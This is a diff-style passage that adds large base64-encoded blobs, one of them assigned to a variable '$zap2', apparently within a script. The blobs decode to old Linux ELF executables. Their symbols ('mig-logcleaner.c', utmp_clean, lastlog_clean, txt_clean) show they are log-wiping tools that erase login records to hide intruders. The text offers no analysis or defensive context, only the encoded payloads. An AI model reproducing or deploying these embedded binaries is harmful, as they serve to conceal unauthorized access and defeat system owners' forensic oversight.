+PUBzNjQ7cigwLDYpOzAxMDAwMDAwMDAwMDAwMDAwMDAwMDAwOzA3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3
+Nzc7AGxvbmcgbG9uZyB1bnNpZ25lZCBpbnQ6dCgwLDcpPUBzNjQ7cigwLDcpOzAwMDAwMDAwMDAw
+MDA7MDE3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc7AHNob3J0IGludDp0KDAsOCk9QHMxNjtyKDAsOCk7
+LTMyNzY4OzMyNzY3OwBzaG9ydCB1bnNpZ25lZCBpbnQ6dCgwLDkpPUBzMTY7cigwLDkpOzA7NjU1
+MzU7AHNpZ25lZCBjaGFyOnQoMCwxMCk9QHM4O3IoMCwxMCk7LTEyODsxMjc7AHVuc2lnbmVkIGNo
+YXI6dCgwLDExKT1Aczg7cigwLDExKTswOzI1NTsAZmxvYXQ6dCgwLDEyKT1yKDAsMSk7NDswOwBk
+b3VibGU6dCgwLDEzKT1yKDAsMSk7ODswOwBsb25nIGRvdWJsZTp0KDAsMTQpPXIoMCwxKTsxMjsw
+OwBjb21wbGV4IGludDp0KDAsMTUpPXM4cmVhbDooMCwxKSwwLDMyO2ltYWc6KDAsMSksMzIsMzI7
+OwBjb21wbGV4IGZsb2F0OnQoMCwxNik9cigwLDE2KTs4OzA7AGNvbXBsZXggZG91YmxlOnQoMCwx
+Nyk9cigwLDE3KTsxNjswOwBjb21wbGV4IGxvbmcgZG91YmxlOnQoMCwxOCk9cigwLDE4KTsyNDsw
+OwBfX2J1aWx0aW5fdmFfbGlzdDp0KDAsMTkpPSooMCwyMCk9KDAsMjApAC4uL2luY2x1ZGUvbGli
+Yy1zeW1ib2xzLmgAL3Vzci9zcmMvYnVpbGQvMTU4NjU4LWkzODYvQlVJTEQvZ2xpYmMtMi4yLjQv
+YnVpbGQtaTM4Ni1saW51eC9jb25maWcuaAAuLi9zeXNkZXBzL2dudS9fR19jb25maWcuaAAuLi9z
+eXNkZXBzL3VuaXgvc3lzdi9saW51eC9iaXRzL3R5cGVzLmgALi4vaW5jbHVkZS9mZWF0dXJlcy5o
+AC4uL2luY2x1ZGUvc3lzL2NkZWZzLmgALi4vbWlzYy9zeXMvY2RlZnMuaAAvdXNyL2xpYi9nY2Mt
+bGliL2kzODYtcmVkaGF0LWxpbnV4LzIuOTYvaW5jbHVkZS9zdGRkZWYuaABzaXplX3Q6dCg4LDEp
+PSgwLDQpAF9fdV9jaGFyOnQoNCwxKT0oMCwxMSkAX191X3Nob3J0OnQoNCwyKT0oMCw5KQBfX3Vf
+aW50OnQoNCwzKT0oMCw0KQBfX3VfbG9uZzp0KDQsNCk9KDAsNSkAX191X3F1YWRfdDp0KDQsNSk9
+KDAsNykAX19xdWFkX3Q6dCg0LDYpPSgwLDYpAF9faW50OF90OnQoNCw3KT0oMCwxMCkAX191aW50
+OF90OnQoNCw4KT0oMCwxMSkAX19pbnQxNl90OnQoNCw5KT0oMCw4KQBfX3VpbnQxNl90OnQoNCwx
+MCk9KDAsOSkAX19pbnQzMl90OnQoNCwxMSk9KDAsMSkAX191aW50MzJfdDp0KDQsMTIpPSgwLDQp
+AF9faW50NjRfdDp0KDQsMTMpPSgwLDYpAF9fdWludDY0X3Q6dCg0LDE0KT0oMCw3KQBfX3FhZGRy
+X3Q6dCg0LDE1KT0oNCwxNik9Kig0LDYpAF9fZGV2X3Q6dCg0LDE3KT0oNCw1KQBfX3VpZF90OnQo
+NCwxOCk9KDQsMykAX19naWRfdDp0KDQsMTkpPSg0LDMpAF9faW5vX3Q6dCg0LDIwKT0oNCw0KQBf
+X21vZGVfdDp0KDQsMjEpPSg0LDMpAF9fbmxpbmtfdDp0KDQsMjIpPSg0LDMpAF9fb2ZmX3Q6dCg0
+LDIzKT0oMCwzKQBfX2xvZmZfdDp0KDQsMjQpPSg0LDYpAF9fcGlkX3Q6dCg0LDI1KT0oMCwxKQBf
+X3NzaXplX3Q6dCg0LDI2KT0oMCwxKQBfX3JsaW1fdDp0KDQsMjcpPSg0LDQpAF9fcmxpbTY0X3Q6
+dCg0LDI4KT0oNCw1KQBfX2lkX3Q6dCg0LDI5KT0oNCwzKQBfX2ZzaWRfdDp0KDQsMzApPSg0LDMx
+KT1zOF9fdmFsOig0LDMyKT1hcig0LDMzKT1yKDQsMzMpOzAwMDAwMDAwMDAwMDA7MDAzNzc3Nzc3
+Nzc3Nzs7MDsxOygwLDEpLDAsNjQ7OwBfX2RhZGRyX3Q6dCg0LDM0KT0oMCwxKQBfX2NhZGRyX3Q6
+dCg0LDM1KT0oNCwzNik9KigwLDIpAF9fdGltZV90OnQoNCwzNyk9KDAsMykAX191c2Vjb25kc190
+OnQoNCwzOCk9KDAsNCkAX19zdXNlY29uZHNfdDp0KDQsMzkpPSgwLDMpAF9fc3dibGtfdDp0KDQs
+NDApPSgwLDMpAF9fY2xvY2tfdDp0KDQsNDEpPSgwLDMpAF9fY2xvY2tpZF90OnQoNCw0Mik9KDAs
+MSkAX190aW1lcl90OnQoNCw0Myk9KDAsMSkAX19rZXlfdDp0KDQsNDQpPSgwLDEpAF9faXBjX3Bp
+ZF90OnQoNCw0NSk9KDAsOSkAX19ibGtzaXplX3Q6dCg0LDQ2KT0oMCwzKQBfX2Jsa2NudF90OnQo
+NCw0Nyk9KDAsMykAX19ibGtjbnQ2NF90OnQoNCw0OCk9KDQsNikAX19mc2Jsa2NudF90OnQoNCw0
+OSk9KDQsNCkAX19mc2Jsa2NudDY0X3Q6dCg0LDUwKT0oNCw1KQBfX2ZzZmlsY250X3Q6dCg0LDUx
+KT0oNCw0KQBfX2ZzZmlsY250NjRfdDp0KDQsNTIpPSg0LDUpAF9faW5vNjRfdDp0KDQsNTMpPSg0
+LDUpAF9fb2ZmNjRfdDp0KDQsNTQpPSg0LDI0KQBfX3Rfc2NhbGFyX3Q6dCg0LDU1KT0oMCwzKQBf
+X3RfdXNjYWxhcl90OnQoNCw1Nik9KDAsNSkAX19pbnRwdHJfdDp0KDQsNTcpPSgwLDEpAF9fc29j
+a2xlbl90OnQoNCw1OCk9KDAsNCkALi4vbGludXh0aHJlYWRzL3N5c2RlcHMvcHRocmVhZC9iaXRz
+L3B0aHJlYWR0eXBlcy5oAC4uL3N5c2RlcHMvdW5peC9zeXN2L2xpbnV4L2JpdHMvc2NoZWQuaABf
+X3NjaGVkX3BhcmFtOlQoMTAsMSk9czRfX3NjaGVkX3ByaW9yaXR5OigwLDEpLDAsMzI7OwBfcHRo
+cmVhZF9mYXN0bG9jazpUKDksMSk9czhfX3N0YXR1czooMCwzKSwwLDMyO19fc3BpbmxvY2s6KDAs
+MSksMzIsMzI7OwBfcHRocmVhZF9kZXNjcjp0KDksMik9KDksMyk9Kig5LDQpPXhzX3B0aHJlYWRf
+ZGVzY3Jfc3RydWN0OgBfX3B0aHJlYWRfYXR0cl9zOlQoOSw1KT1zMzZfX2RldGFjaHN0YXRlOigw
+LDEpLDAsMzI7X19zY2hlZHBvbGljeTooMCwxKSwzMiwzMjtfX3NjaGVkcGFyYW06KDEwLDEpLDY0
+LDMyO19faW5oZXJpdHNjaGVkOigwLDEpLDk2LDMyO19fc2NvcGU6KDAsMSksMTI4LDMyO19fZ3Vh
+cmRzaXplOig4LDEpLDE2MCwzMjtfX3N0YWNrYWRkcl9zZXQ6KDAsMSksMTkyLDMyO19fc3RhY2th
+ZGRyOigwLDE5KSwyMjQsMzI7X19zdGFja3NpemU6KDgsMSksMjU2LDMyOzsAcHRocmVhZF9hdHRy
+X3Q6dCg5LDYpPSg5LDUpAHB0aHJlYWRfY29uZF90OnQoOSw3KT0oOSw4KT1zMTJfX2NfbG9jazoo
+OSwxKSwwLDY0O19fY193YWl0aW5nOig5LDIpLDY0LDMyOzsAcHRocmVhZF9jb25kYXR0cl90OnQo
+OSw5KT0oOSwxMCk9czRfX2R1bW15OigwLDEpLDAsMzI7OwBwdGhyZWFkX2tleV90OnQoOSwxMSk9
+KDAsNCkAcHRocmVhZF9tdXRleF90OnQoOSwxMik9KDksMTMpPXMyNF9fbV9yZXNlcnZlZDooMCwx
+KSwwLDMyO19fbV9jb3VudDooMCwxKSwzMiwzMjtfX21fb3duZXI6KDksMiksNjQsMzI7X19tX2tp
+bmQ6KDAsMSksOTYsMzI7X19tX2xvY2s6KDksMSksMTI4LDY0OzsAcHRocmVhZF9tdXRleGF0dHJf
+dDp0KDksMTQpPSg5LDE1KT1zNF9fbXV0ZXhraW5kOigwLDEpLDAsMzI7OwBwdGhyZWFkX29uY2Vf
+dDp0KDksMTYpPSgwLDEpAF9wdGhyZWFkX3J3bG9ja190OlQoOSwxNyk9czMyX19yd19sb2NrOig5
+LDEpLDAsNjQ7X19yd19yZWFkZXJzOigwLDEpLDY0LDMyO19fcndfd3JpdGVyOig5LDIpLDk2LDMy
+O19fcndfcmVhZF93YWl0aW5nOig5LDIpLDEyOCwzMjtfX3J3X3dyaXRlX3dhaXRpbmc6KDksMiks
+MTYwLDMyO19fcndfa2luZDooMCwxKSwxOTIsMzI7X19yd19wc2hhcmVkOigwLDEpLDIyNCwzMjs7
+AHB0aHJlYWRfcndsb2NrX3Q6dCg5LDE4KT0oOSwxNykAcHRocmVhZF9yd2xvY2thdHRyX3Q6dCg5
+LDE5KT0oOSwyMCk9czhfX2xvY2traW5kOigwLDEpLDAsMzI7X19wc2hhcmVkOigwLDEpLDMyLDMy
+OzsAcHRocmVhZF9zcGlubG9ja190OnQoOSwyMSk9KDAsMSkAcHRocmVhZF9iYXJyaWVyX3Q6dCg5
+LDIyKT0oOSwyMyk9czIwX19iYV9sb2NrOig5LDEpLDAsNjQ7X19iYV9yZXF1aXJlZDooMCwxKSw2
+NCwzMjtfX2JhX3ByZXNlbnQ6KDAsMSksOTYsMzI7X19iYV93YWl0aW5nOig5LDIpLDEyOCwzMjs7
+AHB0aHJlYWRfYmFycmllcmF0dHJfdDp0KDksMjQpPSg5LDI1KT1zNF9fcHNoYXJlZDooMCwxKSww
+LDMyOzsAcHRocmVhZF90OnQoOSwyNik9KDAsNSkAd2NoYXJfdDp0KDExLDEpPSgwLDMpAHdpbnRf
+dDp0KDExLDIpPSgwLDQpAC4uL2luY2x1ZGUvd2NoYXIuaAAuLi93Y3NtYnMvd2NoYXIuaAAuLi9z
+eXNkZXBzL3VuaXgvc3lzdi9saW51eC9pMzg2L2JpdHMvd2NoYXIuaABfX21ic3RhdGVfdDp0KDEz
+LDEpPSgxMywyKT1zOF9fY291bnQ6KDAsMSksMCwzMjtfX3ZhbHVlOigxMywzKT11NF9fd2NoOigx
+MSwyKSwwLDMyO19fd2NoYjooMTMsNCk9YXIoNCwzMyk7MDszOygwLDIpLDAsMzI7OywzMiwzMjs7
+AF9HX2Zwb3NfdDp0KDMsMSk9KDMsMik9czEyX19wb3M6KDQsMjMpLDAsMzI7X19zdGF0ZTooMTMs
+MSksMzIsNjQ7OwBfR19mcG9zNjRfdDp0KDMsMyk9KDMsNCk9czE2X19wb3M6KDQsNTQpLDAsNjQ7
+X19zdGF0ZTooMTMsMSksNjQsNjQ7OwAuLi9pbmNsdWRlL2djb252LmgALi4vaWNvbnYvZ2NvbnYu
+aAAgOlQoMTcsMSk9ZV9fR0NPTlZfT0s6MCxfX0dDT05WX05PQ09OVjoxLF9fR0NPTlZfTk9EQjoy
+LF9fR0NPTlZfTk9NRU06MyxfX0dDT05WX0VNUFRZX0lOUFVUOjQsX19HQ09OVl9GVUxMX09VVFBV
+VDo1LF9fR0NPTlZfSUxMRUdBTF9JTlBVVDo2LF9fR0NPTlZfSU5DT01QTEVURV9JTlBVVDo3LF9f
+R0NPTlZfSUxMRUdBTF9ERVNDUklQVE9SOjgsX19HQ09OVl9JTlRFUk5BTF9FUlJPUjo5LDsAIDpU
+KDE3LDIpPWVfX0dDT05WX0lTX0xBU1Q6MSxfX0dDT05WX0lHTk9SRV9FUlJPUlM6Miw7AF9fZ2Nv
+bnZfZmN0OnQoMTcsMyk9KDE3LDQpPSooMTcsNSk9ZigwLDEpAF9fZ2NvbnZfaW5pdF9mY3Q6dCgx
+Nyw2KT0oMTcsNyk9KigxNyw4KT1mKDAsMSkAX19nY29udl9lbmRfZmN0OnQoMTcsOSk9KDE3LDEw
+KT0qKDE3LDExKT1mKDAsMjApAF9fZ2NvbnZfdHJhbnNfZmN0OnQoMTcsMTIpPSgxNywxMyk9Kigx
+NywxNCk9ZigwLDEpAF9fZ2NvbnZfdHJhbnNfY29udGV4dF9mY3Q6dCgxNywxNSk9KDE3LDE2KT0q
+KDE3LDE3KT1mKDAsMSkAX19nY29udl90cmFuc19xdWVyeV9mY3Q6dCgxNywxOCk9KDE3LDE5KT0q
+KDE3LDIwKT1mKDAsMSkAX19nY29udl90cmFuc19pbml0X2ZjdDp0KDE3LDIxKT0oMTcsMjIpPSoo
+MTcsMjMpPWYoMCwxKQBfX2djb252X3RyYW5zX2VuZF9mY3Q6dCgxNywyNCk9KDE3LDI1KT0qKDE3
+LDI2KT1mKDAsMjApAF9fZ2NvbnZfdHJhbnNfZGF0YTpUKDE3LDI3KT1zMjBfX3RyYW5zX2ZjdDoo
+MTcsMTIpLDAsMzI7X190cmFuc19jb250ZXh0X2ZjdDooMTcsMTUpLDMyLDMyO19fdHJhbnNfZW5k
+X2ZjdDooMTcsMjQpLDY0LDMyO19fZGF0YTooMCwxOSksOTYsMzI7X19uZXh0OigxNywyOCk9Kigx
+NywyNyksMTI4LDMyOzsAX19nY29udl9zdGVwOlQoMTcsMjkpPXM1Nl9fc2hsaWJfaGFuZGxlOigx
+NywzMCk9KigxNywzMSk9eHNfX2djb252X2xvYWRlZF9vYmplY3Q6LDAsMzI7X19tb2RuYW1lOigx
+NywzMik9KigwLDIpLDMyLDMyO19fY291bnRlcjooMCwxKSw2NCwzMjtfX2Zyb21fbmFtZTooNCwz
+NiksOTYsMzI7X190b19uYW1lOig0LDM2KSwxMjgsMzI7X19mY3Q6KDE3LDMpLDE2MCwzMjtfX2lu
+aXRfZmN0OigxNyw2KSwxOTIsMzI7X19lbmRfZmN0OigxNyw5KSwyMjQsMzI7X19taW5fbmVlZGVk
+X2Zyb206KDAsMSksMjU2LDMyO19fbWF4X25lZWRlZF9mcm9tOigwLDEpLDI4OCwzMjtfX21pbl9u
+ZWVkZWRfdG86KDAsMSksMzIwLDMyO19fbWF4X25lZWRlZF90bzooMCwxKSwzNTIsMzI7X19zdGF0
+ZWZ1bDooMCwxKSwzODQsMzI7X19kYXRhOigwLDE5KSw0MTYsMzI7OwBfX2djb252X3N0ZXBfZGF0
+YTpUKDE3LDMzKT1zMzZfX291dGJ1ZjooMTcsMzQpPSooMCwxMSksMCwzMjtfX291dGJ1ZmVuZDoo
+MTcsMzQpLDMyLDMyO19fZmxhZ3M6KDAsMSksNjQsMzI7X19pbnZvY2F0aW9uX2NvdW50ZXI6KDAs
+MSksOTYsMzI7X19pbnRlcm5hbF91c2U6KDAsMSksMTI4LDMyO19fc3RhdGVwOigxNywzNSk9Kigx
+MywxKSwxNjAsMzI7X19zdGF0ZTooMTMsMSksMTkyLDY0O19fdHJhbnM6KDE3LDI4KSwyNTYsMzI7
+OwBfX2djb252X2luZm86VCgxNywzNik9czhfX25zdGVwczooOCwxKSwwLDMyO19fc3RlcHM6KDE3
+LDM3KT0qKDE3LDI5KSwzMiwzMjtfX2RhdGE6KDE3LDM4KT1hcig0LDMzKTswOy0xOygxNywzMyks
+NjQsMDs7AF9fZ2NvbnZfdDp0KDE3LDM5KT0oMTcsNDApPSooMTcsMzYpAF9HX2ljb252X3Q6dCgz
+LDUpPSgzLDYpPXU0NF9fY2Q6KDE3LDM2KSwwLDY0O19fY29tYmluZWQ6KDMsNyk9czQ0X19jZDoo
+MTcsMzYpLDAsNjQ7X19kYXRhOigxNywzMyksNjQsMjg4OzssMCwzNTI7OwBfR19pbnQxNl90OnQo
+Myw4KT0oMCw4KQBfR19pbnQzMl90OnQoMyw5KT0oMCwxKQBfR191aW50MTZfdDp0KDMsMTApPSgw
+LDkpAF9HX3VpbnQzMl90OnQoMywxMSk9KDAsNCkAX0lPX3N0ZGluX3VzZWQ6RygwLDEpAABHQ0M6
+IChHTlUpIDIuOTYgMjAwMDA3MzEgKFJlZCBIYXQgTGludXggNy4yIDIuOTYtMTA4LjcuMikAAEdD
+QzogKEdOVSkgMi45NiAyMDAwMDczMSAoUmVkIEhhdCBMaW51eCA3LjIgMi45Ni0xMDguNy4yKQAA
+R0NDOiAoR05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0ND
+OiAoR05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0NDOiAo
+R05VKSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMSAyLjk2LTk4KQAAR0NDOiAoR05V
+KSAyLjk2IDIwMDAwNzMxIChSZWQgSGF0IExpbnV4IDcuMiAyLjk2LTEwOC43LjIpAAgAAAAAAAAA
+AQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAgAAAAA
+AAAAAQAAADAxLjAxAAAACAAAAAAAAAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAu
+c3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRhZwAuaGFzaAAuZHlu
+c3ltAC5keW5zdHIALmdudS52ZXJzaW9uAC5nbnUudmVyc2lvbl9yAC5yZWwuZHluAC5yZWwucGx0
+AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJvZGF0YQAuZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5k
+dG9ycwAuZ290AC5keW5hbWljAC5zYnNzAC5ic3MALnN0YWIALnN0YWJzdHIALmNvbW1lbnQALm5v
+dGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAA
+APSABAj0AAAAEwAAAAAAAAAAAAAAAQAAAAAAAAAjAAAABwAAAAIAAAAIgQQICAEAACAAAAAAAAAA
+AAAAAAQAAAAAAAAAMQAAAAUAAAACAAAAKIEECCgBAADIAAAABAAAAAAAAAAEAAAABAAAADcAAAAL
+AAAAAgAAAPCBBAjwAQAA8AEAAAUAAAABAAAABAAAABAAAAA/AAAAAwAAAAIAAADggwQI4AMAACwB
+AAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAADIUECAwFAAA+AAAABAAAAAAAAAACAAAAAgAA
+AFQAAAD+//9vAgAAAEyFBAhMBQAAMAAAAAUAAAABAAAABAAAAAAAAABjAAAACQAAAAIAAAB8hQQI
+fAUAACAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkAAAACAAAAnIUECJwFAADIAAAABAAAAAsAAAAE
+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
+AAAAEgAMAGIBAACMxwQIAAAAABEAFABrAQAAnIYECIEAAAAiAAAAjAEAAKyGBAg9AAAAEgAAAJ0B
+AAC8hgQILwAAABIAAACvAQAAOKYECH8BAAASAAwAtQEAAMyGBAg3AAAAEgAAAMYBAAAgqAQIBAAA
+ABAADgDNAQAA3IYECCkAAAASAAAA4AEAAADHBAgEAAAAEQAPAOIBAADshgQI5AIAABIAAAD0AQAA
+SKEECBAEAAASAAwA+QEAAGSGBAgAAAAAEgAKAP8BAAD8hgQIcAIAABIAAAARAgAAWKUECN4AAAAS
+AAwAGwIAAAyHBAhcAAAAEgAAAC0CAAAchwQIrAAAACIAAABQAgAAVMgECAQAAAARABYAYgIAAFjI
+BAgEAAAAEQAWAHQCAAAgiAQIAAAAABIADAB7AgAALIcECDAAAAASAAAAjQIAAOSXBAg7AQAAEgAM
+AJsCAAAgmQQIKAgAABIADACjAgAAPIcECB0AAAASAAAAtQIAAPzGBAgEAAAAEQAPALcCAABckQQI
+hQYAABIADADCAgAAVMgECAAAAAARAPH/zgIAACCJBAhYBwAAEgAMANMCAABMhwQIxgAAABIAAADw
+AgAA4MYECAAAAAAgAA8A+wIAAFyHBAguAAAAEgAAAA0DAAAAqAQIAAAAABIADQATAwAAbIcECD0A
+AAASAAAAJAMAAHyHBAg3AAAAEgAAADYDAACMhwQIgQAAACIAAABSAwAAnIcECD0AAAASAAAAYgMA
+AKyHBAgxAAAAEgAAAHMDAAC8hwQIPQEAABIAAACHAwAAzIcECPUAAAASAAAAlwMAANyHBAgnAAAA
+EgAAAKcDAABUyAQIAAAAABEA8f+uAwAAGMcECAAAAAARABMAxAMAAHjIBAgAAAAAEQDx/8kDAABc
+yAQIBAAAABEAFgDbAwAAJKgECAQAAAARAA4A6gMAAOyHBAgpAAAAEgAAAP0DAADgxgQIAAAAABAA
+DwAKBAAA/IcECD0AAAASAAAAGgQAAAAAAAAAAAAAIAAAACkEAAAMiAQIHwAAABIAAAAAaW5pdGZp
+bmkuYwBnY2MyX2NvbXBpbGVkLgBjYWxsX2dtb25fc3RhcnQAaW5pdC5jAGNydHN0dWZmLmMAcC4w
+AF9fRFRPUl9MSVNUX18AY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AF9fRUhfRlJB
+TUVfQkVHSU5fXwBmaW5pX2R1bW15AG9iamVjdC4yAGZyYW1lX2R1bW15AGluaXRfZHVtbXkAZm9y
+Y2VfdG9fZGF0YQBfX0NUT1JfTElTVF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABfX0NUT1JfRU5E
+X18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AbWlnLWxvZ2NsZWFuZXIuYwBsYXN0bG9nX2hv
+c3RuYW1lAGxhc3Rsb2dfdGltZQBsYXN0bG9nX3R0eQBhdG9sQEBHTElCQ18yLjAAY291bnRfcmVj
+b3JkcwBfRFlOQU1JQwBfX3JlZ2lzdGVyX2ZyYW1lX2luZm9AQEdMSUJDXzIuMAB3cml0ZUBAR0xJ
+QkNfMi4wAHN0cmNtcEBAR0xJQkNfMi4wAHVzYWdlAGNsb3NlQEBHTElCQ18yLjAAX2ZwX2h3AGZw
+cmludGZAQEdMSUJDXzIuMABsAHN5c3RlbUBAR0xJQkNfMi4wAGFkZGQAX2luaXQAbWFsbG9jQEBH
+TElCQ18yLjAAdHh0X2NsZWFuAHJlbW92ZUBAR0xJQkNfMi4wAF9fZGVyZWdpc3Rlcl9mcmFtZV9p
+bmZvQEBHTElCQ18yLjAAc3Rkb3V0QEBHTElCQ18yLjAAc3RkZXJyQEBHTElCQ18yLjAAX3N0YXJ0
+AGdldG9wdEBAR0xJQkNfMi4wAGxhc3Rsb2dfY2xlYW4AcmVwbGFzZQBzdHJsZW5AQEdMSUJDXzIu
+MABjAHV0bXBfY2xlYW4AX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNf
+Mi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2ZpbmkAbHNlZWtAQEdMSUJDXzIuMABt
+ZW1jcHlAQEdMSUJDXzIuMABfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4xLjMAb3BlbkBAR0xJQkNf
+Mi4wAGJ6ZXJvQEBHTElCQ18yLjAAZ2V0cHduYW1AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAA
+YXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABvcHRhcmdA
+QEdMSUJDXzIuMABfSU9fc3RkaW5fdXNlZABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0
+AHJlYWRAQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBzdHJjcHlAQEdMSUJDXzIuMAA=";
+
+$zap2="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAcIQECDQAAABEDAAAAAAAADQAIAAHACgAGwAYAAYAAAA0
+AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIowkAAKMJAAAFAAAAABAAAAEAAACkCQAApJkECKSZBAgoAQAAMAEA
+AAYAAAAAEAAAAgAAALQJAAC0mQQItJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI
+IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s
+aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAAAMAAAAOAAAADQAAAAwA
+AAALAAAAAAAAAAAAAAABAAAAAAAAAAAAAAADAAAABAAAAAUAAAAGAAAAAgAAAAkAAAAIAAAABwAA
+AAoAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAB8AAAAEgAAAGcAAAAAAAAAcQAAABIAAABbAAAA
